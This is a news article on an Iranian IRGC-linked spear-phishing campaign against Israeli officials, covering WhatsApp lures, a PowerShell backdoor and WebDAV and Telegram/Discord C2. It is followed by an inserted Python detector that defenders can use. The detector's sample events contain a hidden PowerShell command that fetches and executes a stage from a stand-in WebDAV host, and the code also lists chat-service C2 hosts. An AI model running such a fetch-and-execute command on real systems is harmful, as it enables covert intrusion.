New Iranian cyber campaign targets Israeli officials with deep social engineering

National Digital Agency exposes 'SpearSpecter,' a cyber espionage campaign linked to the IRGC, using WhatsApp lures, impersonation and a PowerShell backdoor to target senior defense and government figures

The National Digital Agency has uncovered a sophisticated and unprecedented Iranian cyber espionage campaign, codenamed “SpearSpecter,” attributed to a known Iranian threat group linked to the Islamic Revolutionary Guard Corps’ intelligence organization (IRGC-IO).
The group—also operating under names such as APT42 and CharmingCypress—has shifted tactics, moving away from broad, indiscriminate cyberattacks to highly targeted espionage based on advanced social engineering.
[Image: Iranian cyber operators, from a Persian-language post] Members of Iran's Islamic Revolutionary Guard Corps (IRGC) operate at computer stations in an undated image (Photo: Screengrab)
In a briefing with cyber researcher Shimi Cohen and Nir Bar Yosef, head of the agency’s cyber unit, officials revealed that the campaign systematically targets high-value individuals in Israel’s defense and government sectors, as well as their family members.
“This campaign marks a significant evolution,” said Bar Yosef. “Cyberattacks are becoming more personal and resource-intensive. It’s not just about stealing passwords anymore—it’s about gaining long-term, persistent access to specific targets.”
The attackers invest days or even weeks building what appear to be legitimate personal or professional connections with their targets. Common lures include invitations to “prestigious conferences” or scheduling “high-level meetings.”
One of their primary tools is WhatsApp, which is used to initiate contact. The messaging platform offers a familiar, trusted interface that helps build rapport. “The campaign starts with preliminary intelligence gathering,” Cohen explained. “Then the attackers impersonate a legitimate figure and reach out to the target, usually via WhatsApp.”
Once trust is established, a malicious link is sent, triggering a complex attack chain. For lower-value targets, the link leads to a pre-built fake meeting page that captures login credentials in real time. For higher-value individuals, the goal is to implant a sophisticated backdoor that Google tracks as "TAMECAT." The malware is built on PowerShell, Microsoft's scripting shell and automation framework, which ships with Windows and also runs on Linux and macOS. Because the malicious logic runs inside a trusted, built-in interpreter rather than a separately dropped executable, conventional security tools find it harder to tell apart from legitimate administrative activity.
[Image: Khamenei addressing students in Tehran] Iranian Supreme Leader Ayatollah Ali Khamenei (Photo: KHAMENEI.IR / AFP, West Asia News Agency / Handout via REUTERS)
The attackers also abuse built-in Windows features and the WebDAV protocol (an HTTP extension for remote file access, also used by cloud document-editing services) to stage payloads; Windows can open a remote WebDAV share directly by UNC path, so a payload can be pulled from an attacker-controlled server without an obvious download. To evade detection, they operate a multi-channel command-and-control (C2) infrastructure built on legitimate platforms such as Telegram and Discord. Because the stolen data travels to those services over ordinary HTTPS, the traffic blends in with normal usage.
“The innovation here lies in masking the data flow,” said Cohen. “They use legitimate services like Telegram and Discord as control servers. This makes it extremely difficult for traditional security systems to detect the exfiltration of data.” Bar Yosef added, “In this threat landscape, the number one rule is: verify, verify and verify again.”
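The staging and C2 patterns described above (PowerShell pulling a stage over WebDAV, then PowerShell talking to Telegram or Discord) leave telemetry a defender can key on. The following is an added example written for this page, not the National Digital Agency's or any vendor's detection logic: a small Python detector that runs two heuristics over constructed Sysmon-style process-creation and network-connection events and escalates a host where both fire. The log line format, computer names, paths and user names are assumptions made for the example; the Windows WebDAV UNC forms (\\host@SSL\DavWWWRoot\... and \\host@<port>\...) and the Telegram/Discord API host names are real.

```python
"""Heuristic detections for the tradecraft described in the article:
PowerShell fetching a stage from a WebDAV share via the built-in Windows
WebDAV client (UNC paths such as \\host@SSL\DavWWWRoot\...), and PowerShell
talking to Telegram or Discord API hosts (C2 hidden inside legitimate
services). Illustrative code written for this page, not the agency's or any
vendor's detection logic. The log format is a simplified Sysmon-style
'Key=Value|Key=Value' line (EventID 1 = process creation, EventID 3 = network
connection); every event, host, path and user in SAMPLE_EVENTS is constructed.
"""
import re
from collections import defaultdict

# Bot/webhook endpoints of legitimate chat platforms. PowerShell connecting to
# them directly (rather than the Discord/Telegram desktop app) is rare in most
# environments and worth an alert.
C2_SERVICE_HOSTS = {
    "api.telegram.org",
    "discord.com",
    "discordapp.com",
    "cdn.discordapp.com",
}

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Windows resolves \\host@SSL\... and \\host@<port>\... through its WebDAV
# client (the WebClient service); DavWWWRoot marks a WebDAV root share.
WEBDAV_UNC = re.compile(
    r"\\\\[\w.-]+@(?:ssl(?:@\d+)?|\d{2,5})\\"   # \\host@SSL\  or  \\host@8080\
    r"|\\\\[\w.-]+\\davwwwroot\\",             # \\host\DavWWWRoot\
    re.IGNORECASE,
)


def parse_event(line):
    """Turn 'Key=Value|Key=Value' into a dict; values may contain '=' but not '|'."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def is_powershell(image):
    """True if the Image field's file name is a PowerShell host process."""
    return image.lower().rsplit("\\", 1)[-1] in POWERSHELL_IMAGES


def analyze_event(ev):
    """Return the detection names that fire on a single parsed event."""
    hits = []
    if not is_powershell(ev.get("Image", "")):
        return hits  # both rules key on PowerShell; other processes are out of scope
    if ev.get("EventID") == "1" and WEBDAV_UNC.search(ev.get("CommandLine", "")):
        hits.append("powershell_webdav_staging")
    if ev.get("EventID") == "3" and ev.get("DestinationHostname", "").lower() in C2_SERVICE_HOSTS:
        hits.append("powershell_chat_service_c2")
    return hits


def analyze_log(lines):
    """Group hits per Computer; a host showing both staging and C2 is escalated."""
    per_host = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        for hit in analyze_event(ev):
            per_host[ev.get("Computer", "?")].add(hit)
    report = {}
    for host, hits in per_host.items():
        full_chain = {"powershell_webdav_staging", "powershell_chat_service_c2"} <= hits
        report[host] = {"hits": sorted(hits), "severity": "high" if full_chain else "medium"}
    return report


# Constructed sample telemetry: WS-01 shows the full chain, WS-02 is benign use
# of the Discord desktop client, WS-03 is ordinary administrative PowerShell.
SAMPLE_EVENTS = [
    r"EventID=1|Computer=WS-01|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Windows\explorer.exe"
    r'|CommandLine=powershell.exe -w hidden -c "iex (gc \\files.example.com@SSL\DavWWWRoot\stage.txt -Raw)"',
    r"EventID=3|Computer=WS-01|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|DestinationHostname=api.telegram.org|DestinationPort=443",
    r"EventID=3|Computer=WS-02|Image=C:\Users\alice\AppData\Local\Discord\app-1.0.9\Discord.exe"
    r"|DestinationHostname=discord.com|DestinationPort=443",
    r"EventID=1|Computer=WS-03|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Windows\System32\cmd.exe"
    r"|CommandLine=powershell.exe -File C:\Scripts\inventory.ps1",
    r"EventID=3|Computer=WS-03|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|DestinationHostname=www.powershellgallery.com|DestinationPort=443",
]

if __name__ == "__main__":
    for host, result in analyze_log(SAMPLE_EVENTS).items():
        print(host, result["severity"], ", ".join(result["hits"]))
```

Run it directly to print one line per flagged host (only WS-01 fires, at high severity). In a real deployment the two rules map onto Sysmon Event IDs 1 and 3 or the equivalent EDR telemetry; the chat-service host list should be tuned to whatever platforms the organization actually sanctions, and the per-host correlation is what keeps a single benign Discord connection from paging anyone.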
National Digital Agency recommendations:
  • Double verification: If you receive a WhatsApp message or email asking you to click a link, verify by phone using an official, known number.
  • Enable multi-factor authentication (MFA) on all sensitive accounts.
  • Reduce exposure: Limit the public sharing of sensitive information—such as past military roles or official titles—on social profiles. Attackers use this data to build convincing impersonation scenarios and for surveillance, as seen in past incidents like Hamas’s social media tracking of IDF soldiers.